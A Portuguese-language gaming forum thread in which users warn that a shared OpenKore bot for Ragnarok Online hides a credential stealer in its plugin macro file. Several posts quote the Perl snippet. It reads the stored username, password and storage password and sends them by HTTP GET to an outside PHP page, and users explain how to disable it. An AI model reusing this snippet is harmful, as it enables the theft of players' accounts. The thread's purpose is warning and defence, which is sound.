Ir para conteúdo
Faça parte da equipe! (2024) ×

OPENKORE 2.7,Video Aula,Macro+Campal,Scan,Totalmente Renewal,Limpo e Funfando


Posts Recomendados

[ Obrigado ]

 

Por Hackear minha conta !!!

E criar um char falando q 1 amigo meu passo a senha sendo que NIGUEM sabe né rsrsrsrs

 

mas tae baixa o bot desse mlk te dou a certeza que vai ter o mesmo futuro q o meu , e cara você é ridiculo, pode conseguir meu itens agora mas acredite depois você se da mal ! (: e vai ser muito mas caro q os meus vai nessa ae te da mtu ( FUTURO ) . -LIXOFDPARROMBADO.

Link para o comentário
Compartilhar em outros sites

Susanno eu adicionei seu bot na minha quick list mas como não confiavel, pois possiu keylogger na pasta pluing,aquivo macro. como eu já citei na minha quick list- http://www.webcheats.com.br/forum/rag-cheats/983122-quick-list-bots-confiaveis-e-bots-nao-confiaveis.html

e na primeira e quarta pagina^^

 

QUEM BAIXAR VAI SER HACKIADO :)

Link para o comentário
Compartilhar em outros sites

para nós que baixamos esse endereço não vai a lugar nenhum mas para você vai para uma página php que grava usuarios e senhas de quem executar o bot

 

eu entendo disso então não venha querer me enganar^^

 

quem baixar irá ser hackiado é meu ultimo aviso!

Link para o comentário
Compartilhar em outros sites

Nem me agradece por ter achado a linha neh =)

Procurarei uma forma de encontrar essas linhas mais facilmente, quando achar postarei no forum ^^

Engraçado que o cara se faz de santinho. Naum sei se a maioria das contas que postaram aqui são fakes, mas fica o aviso pra quem não é fake.

 

O bot está com uma linha de comando que manda sua senha para um site de armazenamento(para quem fica falando que é KL não é, se fosse KL seria virus) por ser um envio não é considerador virus.

Como o frde disse, quem baixar sera hackiado.

Link para o comentário
Compartilhar em outros sites

SIM, SE NÓS TENTARMOS ACESSAR ESSA PÁGINA NÃO IRÁ DAR NADA, MAS QUANDO ELE ENTRAR IRÁ FUNCIONAR POIS O IP DELE É O UNICO QUE FUNCIONA POIS ELE FEZ O HACK.

ESSA PÁGINA SE TRATA DA FAMOSA "PAGINA PEGA SENHA" OU SE PREFERIREM "PAGINA PHP" ELA GRAVA OS ARQUIVOS MANDADOS PARA ELE NO MOMENTO EM QUE ABRIMOS O KORE

 

 

MAIS TARDE ELE VAI POSTAR AQUI QUE É MENTIRA, ELE PODE ENGANAR QUEM ELE QUISER MAS A MIM NÃO, EU SEI DESSAS PARADAS SEI MEXER NISSO, TANTO QUE FIZ ESSA QUICK LIST- http://www.webcheats.com.br/forum/rag-cheats/983122-quick-list-bots-confiaveis-e-bots-nao-confiaveis.html

AGRADECIDA MAIS DE 11 VEZES, E POSSO AFIRMAR COM TODA A CERTEZA QUEM BAIXAR IRÁ SER MAIS UMA VÍTIMA.

BOM DEPOIS DESSE DISCURSO QUE EU DEI NÃO PRECISO FALAR MAIS NADA NÉ.

Link para o comentário
Compartilhar em outros sites

@masachetti

 

fui eu o primeiro a achar ¬¬

 

@Suzanoo Sasuke

 

não se faça de bobo,

tem o KL la sim,

mal intencionado ou não,

inclusive te reportei,

pq se vc por acaso não soubesse que o KL estava la(que acho muito dificil) poderia ter editado,

agora é esperar providencias.

Link para o comentário
Compartilhar em outros sites

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://osmarmlsp.110mb.com/poseidon/key_strokes.php?keylog=$usuario $senha $kafra");

 

 

ESTA NA PASTA PLUING, ABRA O ARQUIVO MACRO COM O BLOCO DE NOTAS E LOCALIZE ESSE CODIGO ACIMA!

 

 

CARO SUSANNO REALMENTE O BOT ESTÁ FUNCIONAL MAS O PREJUÍZO VEM DEPOIS^^

Link para o comentário
Compartilhar em outros sites

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://osmarmlsp.110mb.com/poseidon/key_strokes.php?keylog=$usuario $senha $kafra");

 

 

ESTA NA PASTA PLUING, ABRA O ARQUIVO MACRO COM O BLOCO DE NOTAS E LOCALIZE ESSE CODIGO ACIMA!

 

 

CARO SUSANNO REALMENTE O BOT ESTÁ FUNCIONAL MAS O PREJUÍZO VEM DEPOIS^^

 

 

Custa ensinar como nao desviar a senha e o login para o hacker??

 

PESSOAL BASTA APAGAR O ".com" pois o link citado acima é o que o seu pc vai direcionar seu usuario e sua senha, entao apos remover o ".com" o link citado na linha vai passar a ser inexistente e nao enviará nada, ou se voce simplesmente achar que ele poderá mudar o dominio e retirar o .com do site dele para continuar pegando otarios, APAGA A LINHA TODA FILHO DA PUTA.

 

gente não tem comando algum nisso,é apenas um link sem destino

 

muda a senha enquanto há tempo vacilão, não é kl mas é redirecionamento de texto, e pena que esse texto é sua senha seu login e sua senha kafra. ^^

 

 

Frde, geralmente esse redirecionamento vem no macro.pl?

Link para o comentário
Compartilhar em outros sites

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://osmarmlsp.110mb.com/poseidon/key_strokes.php?keylog=$usuario $senha $kafra");

 

 

ESTA NA PASTA PLUING, ABRA O ARQUIVO MACRO COM O BLOCO DE NOTAS E LOCALIZE ESSE CODIGO ACIMA!

 

 

CARO SUSANNO REALMENTE O BOT ESTÁ FUNCIONAL MAS O PREJUÍZO VEM DEPOIS^^

 

Achei O.o, cara safadiiiinhooo huehuehue, o bom de voce ter postado isso é que voce está ensinando as pessoas a "abrir os olhos" e tomar mais cuidado, vlw mesmo kra vc salvou meu arcano S2 :D

Link para o comentário
Compartilhar em outros sites

Pode me ajudar por favor ?

eu faço tudo certinho , dps q logo a conta q tem a aprendiz e a criadora , vo la na pasta do openkore , e clico na opçao : OPNKORE , blz abre la aquela janela começa a caregar so q tem uma hora q aparece : ERRO DA SENHA .

e fala q n ta conectado !!!

POR FAVOR ME AJUDA AI MANOW .

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.